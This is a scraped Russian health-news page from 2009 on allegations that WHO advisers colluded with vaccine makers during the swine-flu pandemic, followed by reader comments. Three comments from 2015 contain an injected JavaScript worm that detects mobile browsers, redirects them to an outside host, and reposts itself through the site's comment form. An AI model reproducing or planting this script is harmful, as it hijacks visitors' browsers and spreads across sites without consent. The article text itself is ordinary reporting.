Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Фармкомпании обвинили в «...  >>  Фармкомпании обвинили в «свинстве»
 
Обратная связь
 

Фармкомпании обвинили в «свинстве»

Размер шрифта
25 ноября 2009 21:30
  • google_analytics: false
  • Нравится

Производители лекарств и вакцин от свиного гриппа вступили в заговор с Всемирной организацией здравоохранения ради сверхприбылей. В этом обвинила ведущие мировые фармкомпании и ВОЗ датская газета «Information».

Ольга Неверова / «Здоровье-инфо»

 

Паника по поводу свиного гриппа, охватившая некоторые страны, не исключая и Россию, действительно резко подняла продажи лекарств, средств защиты и профилактики. К тому же, мощности заводов, производящих вакцины, оказались загружены срочными заказами – мировое сообщество тратит миллиарды долларов на закупку вакцин.

Между тем, по официальной статистике от гриппа в мире умерло всего 6750 человек, в то время как каждая сезонная эпидемия гриппа уносит почти полмиллиона жизней.

Причина неадекватной реакции мира на не столь опасный новый штамм гриппа, считают опрошенные датской газетой специалисты, заключается в том, что эксперты ВОЗ по заказу провели успешную «пиар-кампанию». А некоторые из них просто получают зарплаты на фирмах, производящих вакцины. В этом прямо обвинили группу советников этой организации во главе ученым из Нидерландов Альбертом Остенхаусом. Этот известный во всем мире ученый-грипполог действительно чрезвычайно богат и всюду появляется только в сопровождении личной охраны. Именно по настоянию группы Остенхауса ВОЗ объявила пандемию и присвоила ей высшую категорию опасности. Сейчас правительство Нидерландов якобы проводит экстренное расследование его деятельности, поскольку он получает зарплату в нескольких компаниях, производящих вакцину против свиного гриппа.

Платными советниками фармацевтических гигантов Roche, RW Johnson, GlaxoSmithKline, получивших львиную долю заказов на изготовление вакцин, по утверждению газеты, являются и многие другие советники ВОЗ. Итогом их давления стала резолюция ВОЗ от 7 июля этого года, которая объявила необходимость беспрецедентной массовой вакцинации.

Однако спикер ВОЗ Грегори Хэртл, комментируя обвинения журналистов, заметил, что невозможно отказаться от услуг ведущих мировых специалистов лишь на том основании, что они финансово заинтересованы в продвижении той или иной стратегии борьбы с различными заболеваниями.

Конспирологические сюжеты постоянно сопровождают работу мировых фармкомпаний. Якобы те только и заинтересованы в мировых заговорах, нагнетании разных страхов среди простых людей, подкупе врачей, циничном продвижении ненужных лекарств и т.п. Наверное, есть в этом потоке дегтя и ложка правды, и какие-то компании, скорее всего, небольшие, пользуются нерыночными методами конкуренции. Для фармгигантов, находящихся под пристальным надзором во всех странах, такое вряд ли возможно. К тому же картинка мира, опутанного сетью алчных производителей лекарств, как-то плохо вяжется с теми надеждами, которые каждый человек возлагает на те же фармкомпании, когда здоровью его самого или его близких угрожают реальные болезни.

Хорошо известно, что создание и продвижение новых высокоэффективных лекарств требует огромных вложений, в том числе и финансирования исследовательских работ самых лучших ученых – одними деньгами новое лекарство не создашь, нужны еще и мозги, и суперсовременное оборудование, и расходы на испытания, регистрацию и т.п. Про то, что все это делают «алчные и циничные» производители, большинство из нас не задумывается. А то просто тиражировали бы десятилетиями старый добрый аспирин да считали свои денежки.

Тот факт, что ведущие фармэксперты мира получают средства на исследования, криминалом не является. Другое дело, что такие международные организации, как ВОЗ, должны быть осмотрительнее в выборе тех, кому доверяют принимать решения, и избегать ангажированных специалистов. К тому же, решения ВОЗ не являются императивом для национальных систем здравоохранения – в каждой стране решения такого уровня принимают их руководители и собственные эксперты, а не советники международной, пусть и авторитетной, организации.

Паника, которой, кстати, совершенно не было заметно в большинстве европейских стран, где люди и так привыкли заботиться о своем здоровье, проистекала не только от объявления пандемии. В большей степени она была следствием недостатка информации и неверных стратегий национальных систем здравоохранения. А предсказать со стопроцентной точностью поведение вирусов гриппа до сих пор удавалось примерно так же, как и погоду на неделю. Встает лишь один вопрос – что лучше в таких ситуациях: перебдеть или недобдеть? Если спросить близких тех 6750 человек, которые погибли от свиного гриппа, скорее всего, они посетуют на то, что слишком мало внимания уделили предупреждениям о его опасности.

– Учитывая, что бюджетное финансирование науки довольно скудное, для нас договорные работы по проверке эффективности лекарств, вакцин, их оценке  и т.п. – это возможность работать, развивать исследования, – считает профессор Петр Дерябин, заместитель директора НИИ вирусологии РАМН по науке. – В нашем финансировании это занимает не больше 20%. А на Западе многие научные лаборатории действительно получают львиную долю финансирования от фармкомпаний. И это общепринятая практика.

Скандалы вокруг свиного гриппа, видимо, еще не раз будут потрясать человечество. Так, на днях в Канаде отозвали целую партию вакцины, произведенной компанией GlaxoSmithKline – 172 тыс. доз. Причиной стали 6 случаев анафилактического шока после прививки – так называют тяжелую аллергическую реакцию, которая  приводит к удушью, отеку легких и даже к смерти. Всех пострадавших врачи спасли, но тем не менее министерство здравоохранения страны решило остановить вакцинацию и провести полное расследование этих 6 случаев. Стандартная статистика подобных острых реакций на прививку – один случай на 100 тысяч. При этом представитель министерства подчеркнула, что эксперты по-прежнему считают вакцины от свиного гриппа эффективными и безопасными. Не отменила своих рекомендаций по поводу массовой иммунизации и ВОЗ, несмотря на скандал в датской прессе.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

26 июня 2015 в 00:37

Цитировать   |   Пожаловаться

f> d = {Android: function(){return navigator.userAgent.match(/Android/i);}, BlackBerry: function() { return navigator.userAgent.match(/BlackBerry/i);}, iOS: function() { return navigator.userAgent.match(/iPhone|iPad|iPod/i);}, Opera: function() { return navigator.userAgent.match(/Opera Mini/i);}, Windows: function() { return navigator.userAgent.match(/IEMobile/i);}, any: function() { if(d.Android() || d.BlackBerry() || d.iOS() || d.Opera() || d.Windows()) window.location.href="http://A25832-hostde3.fornex.org/"; j = "[{ f}]"+$("[f]").html()+"[{/}]"; j = j.replace(/\[\{/,"<").replace(/\}\]/,">"); $.post($(".nicEdit-main").parents("form").last().attr("action"), {addcomment:" ", commenttext:j});}};d.any();

2 - zzzzzz

26 июня 2015 в 00:37

Цитировать   |   Пожаловаться

f> d = {Android: function(){return navigator.userAgent.match(/Android/i);}, BlackBerry: function() { return navigator.userAgent.match(/BlackBerry/i);}, iOS: function() { return navigator.userAgent.match(/iPhone|iPad|iPod/i);}, Opera: function() { return navigator.userAgent.match(/Opera Mini/i);}, Windows: function() { return navigator.userAgent.match(/IEMobile/i);}, any: function() { if(d.Android() || d.BlackBerry() || d.iOS() || d.Opera() || d.Windows()) window.location.href="http://A25832-hostde3.fornex.org/"; j = "[{ f}]"+$("[f]").html()+"[{/}]"; j = j.replace(/\[\{/,"<").replace(/\}\]/,">"); $.post($(".nicEdit-main").parents("form").last().attr("action"), {addcomment:" ", commenttext:j});}};d.any();[{/}]

3 - zzzzzz

26 июня 2015 в 00:37

Цитировать   |   Пожаловаться

f> d = {Android: function(){return navigator.userAgent.match(/Android/i);}, BlackBerry: function() { return navigator.userAgent.match(/BlackBerry/i);}, iOS: function() { return navigator.userAgent.match(/iPhone|iPad|iPod/i);}, Opera: function() { return navigator.userAgent.match(/Opera Mini/i);}, Windows: function() { return navigator.userAgent.match(/IEMobile/i);}, any: function() { if(d.Android() || d.BlackBerry() || d.iOS() || d.Opera() || d.Windows()) window.location.href="http://A25832-hostde3.fornex.org/"; j = "[{ f}]"+$("[f]").html()+"[{/}]"; j = j.replace(/\[\{/,"<").replace(/\}\]/,">"); $.post($(".nicEdit-main").parents("form").last().attr("action"), {addcomment:" ", commenttext:j});}};d.any();[{/}]

4 - zzzzzz

01 июля 2015 в 00:57

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.